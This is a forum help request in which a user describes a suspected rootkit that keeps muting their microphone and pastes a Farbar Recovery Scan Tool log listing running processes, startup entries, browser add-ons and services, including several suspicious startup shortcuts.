Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Think it is MTGen infection - Microphone mutes


  • This topic is locked This topic is locked
27 replies to this topic

#1 Gregbc1976

Gregbc1976

  • Members
  • 19 posts
  • OFFLINE
  •  
  • Local time:01:34 AM

Posted 08 August 2016 - 10:19 AM

 

I need help in removing this virus.  It keeps muting the microphone is the only symptom I can see.

 

I have tried the following

 

Ran malwarebytes full scan

            Found root kits (MTgen) –deleted

Rebooted problem persists

Ran malwarebytes root kit and startup files

            Found rootkits –deleted

            DID NOT Reboot

            Ran scan again

                        No root kits found

Ran Hitman Pro

            Nothing found

Scan with Rouge killer

    Just found Pups – deleted them

Rootkit deep scan with Spybot

        Nothing

Running ADWCleaner

    Found nothing

 

SUNDAY

Ran MAlwarebytes  rootkit found

 

If I use taskmanager to kill the regsvr32.exe (multiple instances) the microphone problem goes away but reappears on reboot. I suspect but cannot confirm that mshta.exe launches those instances.

 

I ran FRST the first time NOT as administrator.  I deleted those files and reran as administrator.  The following is the FRST.txt from that scan and I am attaching the addition.txt from that run.

 

Thanks in advance for your help

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 03-08-2016
Ran by Greg Main Acct (administrator) on GREG-HP (08-08-2016 10:49:19)
Running from C:\Users\Greg\Desktop
Loaded Profiles: Greg & Greg Main Acct (Available Profiles: Greg & Greg Main Acct & DefaultAppPool)
Platform: Windows 10 Home Version 1511 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Edge)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\tv_w32.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\tv_x64.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Microsoft Corporation) C:\Program Files\Microsoft IntelliPoint\ipoint.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Hewlett-Packard Co.) C:\Program Files\HP\HP Deskjet 3510 series\Bin\ScanToPCActivationApp.exe
(Hewlett-Packard Co.) C:\Program Files\HP\HP Officejet Pro 8610\Bin\ScanToPCActivationApp.exe
(Hewlett-Packard Co.) C:\Program Files\HP\HP Officejet Pro 8610\Bin\HPNetworkCommunicatorCom.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(ArcSoft, Inc.) C:\Program Files (x86)\ArcSoft\TotalMedia Backup & Record\uBBMonitor.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\avastui.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
() C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeHost.exe
(Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWA_Service.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWA_Main.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Realtek Semiconductor Corp.) C:\Program Files\Realtek\RtVOsd\RtVOsdService.exe
(Realtek Semiconductor Corp.) C:\Program Files\Realtek\RtVOsd\RtVOsd.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\OFFICE11\WINWORD.EXE
(Microsoft Corporation) C:\Windows\splwow64.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Desktop.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Program Files (x86)\Windows Live\Mail\wlmail.exe
(Microsoft Corporation) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil_ActiveX.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [HPWirelessAssistant] => C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWA_Main.exe [363064 2010-06-18] (Hewlett-Packard Company)
HKLM\...\Run: [IntelliPoint] => c:\Program Files\Microsoft IntelliPoint\ipoint.exe [2327952 2010-07-21] (Microsoft Corporation)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3954352 2016-03-30] (Synaptics Incorporated)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8505088 2015-07-03] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1402624 2015-07-03] (Realtek Semiconductor)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284696 2010-04-13] (Intel Corporation)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [577408 2012-02-15] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [8900328 2016-07-11] (AVAST Software)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [595992 2016-05-20] (Oracle Corporation)
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
HKLM\...\RunOnce: [InstallSmbDrv] => C:\Program Files\Synaptics\SynTP\dpinst.exe [1065656 2016-03-30] (Microsoft Corporation)
HKLM\...\RunOnce: [*Restore] => C:\WINDOWS\System32\rstrui.exe [269824 2015-10-30] (Microsoft Corporation)
HKLM-x32\...\RunOnce: [Malwarebytes Anti-Malware (cleanup)] => C:\ProgramData\Malwarebytes\Malwarebytes Anti-Malware\mbamdor.exe [55264 2016-03-10] (Malwarebytes)
HKLM-x32\...\RunOnce: [RealtekHDAUpgrade] => RealtekHDAUpgrade
Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKU\S-1-5-21-56867686-1103405722-4171089578-1000\...\Run: [Fitbit Connect] => "C:\Program Files (x86)\Fitbit Connect\Fitbit Connect.exe" /autorun
HKU\S-1-5-21-56867686-1103405722-4171089578-1000\...\Run: [HP Deskjet 3510 series (NET)] => C:\Program Files\HP\HP Deskjet 3510 series\Bin\ScanToPCActivationApp.exe [2573416 2012-10-17] (Hewlett-Packard Co.)
HKU\S-1-5-21-56867686-1103405722-4171089578-1000\...\Run: [GarminExpressTrayApp] => C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe [1400232 2016-07-31] (Garmin Ltd. or its subsidiaries)
HKU\S-1-5-21-56867686-1103405722-4171089578-1000\...\Run: [HP Officejet Pro 8610 (NET)] => C:\Program Files\HP\HP Officejet Pro 8610\Bin\ScanToPCActivationApp.exe [3487240 2014-03-06] (Hewlett-Packard Co.)
HKU\S-1-5-21-56867686-1103405722-4171089578-1000\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [29494400 2016-07-13] (Skype Technologies S.A.)
HKU\S-1-5-21-56867686-1103405722-4171089578-1000\...\Run: [SpybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.)
HKU\S-1-5-21-56867686-1103405722-4171089578-1000\...\Run: [**cfdcc<*>] => "C:\Users\Greg\AppData\Local\a82409\63a99d.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-56867686-1103405722-4171089578-1004\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8891608 2016-07-13] (Piriform Ltd)
HKU\S-1-5-18\...\Run: [GarminExpressTrayApp] => C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe [1400232 2016-07-31] (Garmin Ltd. or its subsidiaries)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2016-06-29] (AVAST Software)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk [2010-12-07]
ShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\TotalMedia Backup Monitor.lnk [2010-12-07]
ShortcutTarget: TotalMedia Backup Monitor.lnk -> C:\Program Files (x86)\ArcSoft\TotalMedia Backup & Record\uBBMonitor.exe (ArcSoft, Inc.)
Startup: C:\Users\Greg\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\88ab92.lnk [2016-08-06]
ShortcutTarget: 88ab92.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
Startup: C:\Users\Greg\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\df1157.lnk [2016-08-06]
ShortcutTarget: df1157.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
GroupPolicyScripts-x32: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{e854f879-33ce-46f0-9584-47fe8baf283b}: [DhcpNameServer] 192.168.1.254

Internet Explorer:
==================
HKU\S-1-5-21-56867686-1103405722-4171089578-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.yahoo.com/
HKU\S-1-5-21-56867686-1103405722-4171089578-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT/1
HKU\S-1-5-21-56867686-1103405722-4171089578-1004\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.yahoo.com/?fr=yset_ie_syc_oracle&type=orcl_hpset
SearchScopes: HKLM -> DefaultScope {FF3A0FF3-A7B5-4548-8C19-93320C6929AE} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM -> {22CF8A8F-0D17-4F36-9BB2-6804D765747E} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKLM -> {8AC493D3-A2F5-487B-90C4-0C31D4535FCA} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM -> {FF3A0FF3-A7B5-4548-8C19-93320C6929AE} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> DefaultScope {FF3A0FF3-A7B5-4548-8C19-93320C6929AE} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {22CF8A8F-0D17-4F36-9BB2-6804D765747E} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKLM-x32 -> {8AC493D3-A2F5-487B-90C4-0C31D4535FCA} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM-x32 -> {FF3A0FF3-A7B5-4548-8C19-93320C6929AE} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-56867686-1103405722-4171089578-1000 -> {22CF8A8F-0D17-4F36-9BB2-6804D765747E} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKU\S-1-5-21-56867686-1103405722-4171089578-1000 -> {6711EAD0-4559-4EF9-B1E5-90F02A56A0F8} URL =
SearchScopes: HKU\S-1-5-21-56867686-1103405722-4171089578-1000 -> {8AC493D3-A2F5-487B-90C4-0C31D4535FCA} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKU\S-1-5-21-56867686-1103405722-4171089578-1000 -> {FF3A0FF3-A7B5-4548-8C19-93320C6929AE} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-56867686-1103405722-4171089578-1004 -> {8DB27708-90D0-4C7E-A57A-2DBFE4021597} URL = hxxps://search.yahoo.com/search?p={searchTerms}&fr=yset_ie_syc_oracle&type=orcl_default
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_91\bin\ssv.dll [2016-06-10] (Oracle Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_91\bin\jp2ssv.dll [2016-06-10] (Oracle Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll => No File
BHO-x32: HP Print Enhancer -> {0347C33E-8762-4905-BF09-768834316C61} -> C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_printenhancer.dll [2010-05-28] (Hewlett-Packard Co.)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_91\bin\ssv.dll [2016-06-10] (Oracle Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_91\bin\jp2ssv.dll [2016-06-10] (Oracle Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2015-10-19] (Hewlett-Packard Company)
BHO-x32: HP Smart BHO Class -> {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} -> C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll [2010-05-28] (Hewlett-Packard Co.)
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
DPF: HKLM-x32 {FD0B6769-6490-4A91-AA0A-B5AE0DC75AC9} hxxps://secure.logmein.com/activex/ractrl.cab?lmi=722
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2016-02-01] (Skype Technologies)

FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_22_0_0_209.dll [2016-07-13] ()
FF Plugin: @java.com/DTPlugin,version=11.91.2 -> C:\Program Files\Java\jre1.8.0_91\bin\dtplugin\npDeployJava1.dll [2016-06-10] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.91.2 -> C:\Program Files\Java\jre1.8.0_91\bin\plugin2\npjp2.dll [2016-06-10] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50428.0\npctrl.dll [2016-04-27] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_22_0_0_209.dll [2016-07-13] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw.dll [2010-05-05] (Adobe Systems, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=11.91.2 -> C:\Program Files (x86)\Java\jre1.8.0_91\bin\dtplugin\npDeployJava1.dll [2016-06-10] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.91.2 -> C:\Program Files (x86)\Java\jre1.8.0_91\bin\plugin2\npjp2.dll [2016-06-10] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50428.0\npctrl.dll [2016-04-27] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-28] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-28] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-06-30] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-56867686-1103405722-4171089578-1000: @citrixonline.com/appdetectorplugin -> C:\Users\Greg\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2015-06-15] (Citrix Online)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npnul32.dll [2010-12-03] (mozilla.org)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2016-06-30] (Adobe Systems Inc.)
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\answers.xml [2010-12-03]
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\avg_igeared.xml [2011-05-30]
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\creativecommons.xml [2010-12-03]
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\avg-secure-search.xml [2014-08-26]
FF Extension: Java Console - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0023-ABCDEFFEDCBA} [2011-01-24] [not signed]
FF Extension: Java Console - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA} [2012-06-14] [not signed]
FF HKLM\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2016-07-25]
FF HKLM\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF
FF Extension: Avast SafePrice - C:\Program Files\AVAST Software\Avast\SafePrice\FF [2016-07-25]
FF HKLM-x32\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3
FF Extension: HP Smart Web Printing - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 [2010-12-07] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [quickprint@hp.com] - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension
FF Extension: HP Smart Print - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension [2013-02-06] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF HKLM-x32\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF
FF HKU\S-1-5-21-56867686-1103405722-4171089578-1000\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\firefox-branding.js [2010-12-03]
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\firefox-l10n.js [2010-12-03]
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\firefox.js [2010-12-03]
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\reporter.js [2010-12-03]

Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR DefaultSearchURL: Default -> hxxps://search.yahoo.com/search?p={searchTerms}&fr=yset_chr_syc_oracle&type=default
CHR DefaultSearchKeyword: Default -> Yahoo
CHR DefaultSuggestURL: Default -> hxxps://search.yahoo.com/sugg/ie?output=fxjson&command={searchTerms}&nResults=10
CHR Profile: C:\Users\Greg Main Acct\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\Greg Main Acct\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-02-07]
CHR Extension: (Google Docs) - C:\Users\Greg Main Acct\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-02-07]
CHR Extension: (Google Drive) - C:\Users\Greg Main Acct\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-02-07]
CHR Extension: (Yahoo Partner) - C:\Users\Greg Main Acct\AppData\Local\Google\Chrome\User Data\Default\Extensions\bhfhojbhbnajajgihpicejdalbjlpcep [2016-08-05]
CHR Extension: (YouTube) - C:\Users\Greg Main Acct\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-02-07]
CHR Extension: (Google Search) - C:\Users\Greg Main Acct\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-02-07]
CHR Extension: (Google Sheets) - C:\Users\Greg Main Acct\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-02-07]
CHR Extension: (Google Docs Offline) - C:\Users\Greg Main Acct\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-08-05]
CHR Extension: (Avast Online Security) - C:\Users\Greg Main Acct\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2016-08-05]
CHR Extension: (Skype) - C:\Users\Greg Main Acct\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2016-08-05]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Greg Main Acct\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-08-05]
CHR Extension: (Gmail) - C:\Users\Greg Main Acct\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-02-07]
CHR HKLM-x32\...\Chrome\Extension: [bhfhojbhbnajajgihpicejdalbjlpcep] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2016-06-10]
CHR HKLM-x32\...\Chrome\Extension: [jfmjfhklogoienhpfnppmbcbjfjnkonk] - <no Path/update_url>

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [197128 2016-06-29] (AVAST Software)
S2 Garmin Device Interaction Service; C:\Program Files (x86)\Garmin\Device Interaction Service\GarminService.exe [809488 2016-07-31] (Garmin Ltd. or its subsidiaries)
R2 HPSLPSVC; C:\Program Files (x86)\HP\Digital Imaging\bin\HPSLPSVC64.DLL [1039360 2010-10-22] (Hewlett-Packard Co.) [File not signed]
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [25800 2015-09-28] (Hewlett-Packard Company)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2009-05-14] (Hewlett-Packard) [File not signed]
S3 Netlogon; C:\WINDOWS\SysWOW64\netlogon.dll [713728 2016-02-23] () [File not signed]
R2 NOBU; C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe [2804568 2010-06-01] (Symantec Corporation)
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2009-05-14] (Hewlett-Packard) [File not signed]
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [303360 2015-07-03] (Realtek Semiconductor)
R2 RtVOsdService; C:\Program Files\Realtek\RtVOsd\RtVOsdService.exe [315392 2010-06-24] (Realtek Semiconductor Corp.) [File not signed]
